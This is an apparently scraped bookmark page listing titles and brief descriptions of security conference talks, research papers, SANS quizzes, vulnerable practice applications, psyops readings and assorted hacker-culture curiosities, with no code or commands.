Analysis and recommendations for standardization in penetration testing and vulnerability assessment
The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
Malware: Anti-forensics
The 35C3 halfnarp
SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
Mojave's Sandbox is Leaky
Code Obfuscation 10*2+(2a+3)%2
DeepState : Bringing vulnerability detection tools into the development lifecycle; see also DeepState: Symbolic Unit Testing for C and C++
Hardware Memory Tagging to make C/C++ memory safe(r) 11,517 20 days ago
wallet.fail : Hacking the most popular cryptocurrency hardware wallets
Reverse Engineering : Closed, heterogeneous platforms and the defenders’ dilemma. Looking back at the last 20 years of RE and looking ahead at the next few. SSTIC 2018, Thomas Dullien (“Halvar Flake”)
Making C Less Dangerous in the Linux kernel
Workshop-BSidesMunich2018 106 over 6 years ago : ARM shellcode and exploit development - BSidesMunich 2018
REhint's Publications 356 almost 5 years ago
INFILTRATE 2019 Demo Materials 340 over 1 year ago
A Practical Approach to Purple Teaming
The Advanced Threats Evolution: REsearchers Arm Race 356 almost 5 years ago by @matrosov
The Beginner Malware Analysis Course + VirusBay Access
ConPresentations 360 about 1 year ago by Maddie Stone
Venturing into the Dark a review of Dark Side Ops 2: Adversary Simulation
Expert voices disinvited from CyberCon
0x0g-2018-badge 19 over 6 years ago
Virtual Cybersecurity Conferences 116 over 3 years ago : An ongoing list of virtual cybersecurity conferences
The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website. 0 over 4 years ago
Offensive Development 241 4 months ago : Post-Exploitation Tradecraft in an EDR World x33fcon 2020
WebSploit Labs workshop hosted by the Red Team Village during YASCON 1 about 4 years ago
The AVAR International Conference is back!
Japan Security Analyst Conference Virtual Edition
{baby,mama,gran}-a-fallen-lap-ray DEFCON 2021 Quals 8 over 3 years ago
Developing Secure Systems Summit (DS3) : The state of the art in developing secure computer systems is advancing rapidly, with progress in several communities around the world spanning the software industry, academia, research labs, and governments
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE : HITBSecConf2019 - Amsterdam
PoC demo for HITB Amsterdam 2021 2 over 3 years ago : Playing hide-n-seek with AWS GuardDuty: Post-DNS era covert channel for C&C and data exfiltration
Securing Cyber-Physical Systems: moving beyond fear
Speaking materials from conferences 9 over 2 years ago by Tim Scythe
TheGlasshouseCtr
Open Source Security Day on Google Open Source Live
hardik05 32 about 2 years ago : My conference presentations and Materials for them
30th USENIX Security Symposium
The Hijackers' Guide to the Galaxy: Off-path Taking over Internet Resources

CSIRT / Resources / SANS / Quiz

April 2021 Forensic Quiz
May 2021 Forensic Contest
June 2021 Forensic Contest

CSIRT / Resources / SANS

Quick Analysis of a Modular InfoStealer
Example of Cleartext Cobalt Strike Traffic
SEC642 papers 3 over 3 years ago : This repository is a collection of papers used in the course that has been deprecated on the wide internet
"Serverless" Phishing Campaign
SANS CTI Summit 2021 102 about 1 year ago
SANS Virtual Summits Will Be FREE for the Community in 2021
Random Forests: Still Useful?

CSIRT / psyops

Read the Pentagon’s 20-Page Report on Its Own Meme
Bezmenov’s Steps (Ideological Subversion)
PAUL LAZARSFELD—THE FOUNDER OF MODERN EMPIRICAL SOCIOLOGY: A RESEARCH BIOGRAPHY
Influence Operations 101 - Media Effects
Hazard Mapping : The information architecture of ethics, a draft proposal
Cognitive Warfare

CSIRT / Sources

hasherezade's 1001 nights

CSIRT / Sources / hasherezade's 1001 nights

How to start RE/malware analysis? | hasherezade's 1001 nights

CSIRT / Sources

List of Helpful Information Security Multimedia 396 over 6 years ago
pocorgtfo 1,315 9 months ago : a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs
FIDO ECDAA Algorithm
stamparm : Miroslav Stampar Repositories (a lot of good stuff)

CSIRT / Sources / GitHub repos

gabrielmachado

CSIRT / Sources / Damn Vulnerable Web Application

Damn Vulnerable Web Application Docker container
Damn Vulnerable Web Application (DVWA) 10,292 14 days ago
Damn Vulnerable C Program 676 about 1 month ago : a C program containing vulnerable code for common types of vulnerabilities; can be used to show fuzzing concepts

CSIRT / Sources

vvmlist : vulnerable virtual machine list is a list of vulnerable vms with their attributes
Nelson Brito's Source 10 4 months ago : This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics
PwnLab: init (pt-br)
Mamont's open FTP Index : a lot of open FTPs!!!
fuzz.txt 2,884 25 days ago : Potentially dangerous files
Free Training: New Certified Learning Paths : The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
Catálogo de Fraudes (pt-br) : Launched in 2008 to alert the education and research community to the main scams circulating on the internet, our Fraud Catalogue is today an important repository of messages classified as fraudulent, serving as a source of information for all of Brazil
Daily Information Security Podcast ("StormCast")
Hackerrank 5 about 3 years ago : Contains code for some of the solutions to HackerRank problems
I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster. #CyberpunkisNow is a project producing Digital Privacy/Anonymity, Counter-Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization
Exodus Research Community
2021 Annual Threat Assessment of the US Intelligence Community
Hamid's Bookmarks 124 10 days ago
EP 67: THE BIG HOUSE (Darknet Diaries)
Wrong Secrets 1,233 7 days ago : Examples of how not to use secrets
Vulnserver 1,001 about 4 years ago : Vulnerable server used for learning software exploitation

CSIRT / Fun

Spoilerwall introduces a brand new concept in the field of network hardening 761 over 4 years ago
abusing github commit history for the lulz 8,069 25 days ago
resist_oped 201 about 6 years ago : 🕵🏽‍♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House
InfoSec BS Bingo
How to fit all of Shakespeare in one tweet (and why not to do it!)
Attrition.org : defacement rank
rot8000 : rot13 for the Unicode generation
Reverse Engineering Pokémon GO Plus : TL;DR: You can clone a Pokémon GO Plus device that you own (GitHub repo)
grugq quotes
Pivots & Payloads Board Game : Introducing the NEW SANS Pen Test Poster by SANS Institute
Chess Steganography
Enigma, the Bombe, and Typex 29,255 30 days ago
A cryptography icon of the Second World War, the Enigma machine has a surviving example in Brazil (pt-br)
Enigma machine : This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit
How I hacked modern Vending Machines
A better zip bomb
Goodbye-World 59 about 6 years ago : The last program that every developer writes
Dumb Password Rules 2,990 18 days ago
Enigma I, Navy M3/M4
FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases by Rob Rosenberger
pivoting (pt-br)
Posters, drawings... 10,521 9 months ago
"Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
THE BEIRUT BANK JOB
BitmapFonts 1,781 almost 4 years ago : My collection of bitmap fonts pulled from various demoscene archives over the years
types of papers XKCD
Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data.
How the Xbox 360 DVD Security was Defeated (MVG)
I was going through my notes this morning and thought CVE-2021-21985 was important to cover
APPSEC EZINE
ZeroVer: 0-based Versioning
The Cartoon Guide to Computer Science
LENS CALCULATOR : Calculate CCTV camera lens focal length, pixel density and camera zones in 3D
Awesome Piracy 24,325 over 1 year ago : A curated list of awesome warez and piracy links
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1
What is von Clausewitz's centers of gravity (COGs) concept?
Place where a stealth fighter was caught on gmaps
High-Security Mechanical Locks
Tetsuji : Remote Code Execution on a GameBoy Colour 22 Years Later
KeyDecoder 3,061 10 months ago : app lets you use your smartphone or tablet to decode your mechanical keys in seconds
Comparative Study of Anti-cheat Methods in Video Games by Samuli Lehtonen

CSIRT / Articles

The Accidental Altruist: Inferring Altruism from an Extraterrestrial Signal
Interstellar communication. IX. Message decontamination is impossible
[1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
[1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
The Hunt for 3ve : Taking down a major ad fraud operation through industry collaboration
Page Cache Attacks : We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache
Identification and Illustration of Insecure Direct Object References and their Countermeasures
China’s Maxim : Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking
Listen to Your Key: Towards Acoustics-based Physical Key Inference
Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
Everything Old is New Again: Binary Security of WebAssembly
Discovering Suspicious APT Behaviors by Analyzing DNS Activities
Harvard Belfer National Cyber Power Index 2020
Quantum Blockchain using entanglement in time
Reflections on Trusting Trust
I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches
BIAS: Bluetooth Impersonation AttackS
LOKI: Hardening Code Obfuscation Against Automated Attacks
FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications

CSIRT / Other Repos

mubix 94 about 3 years ago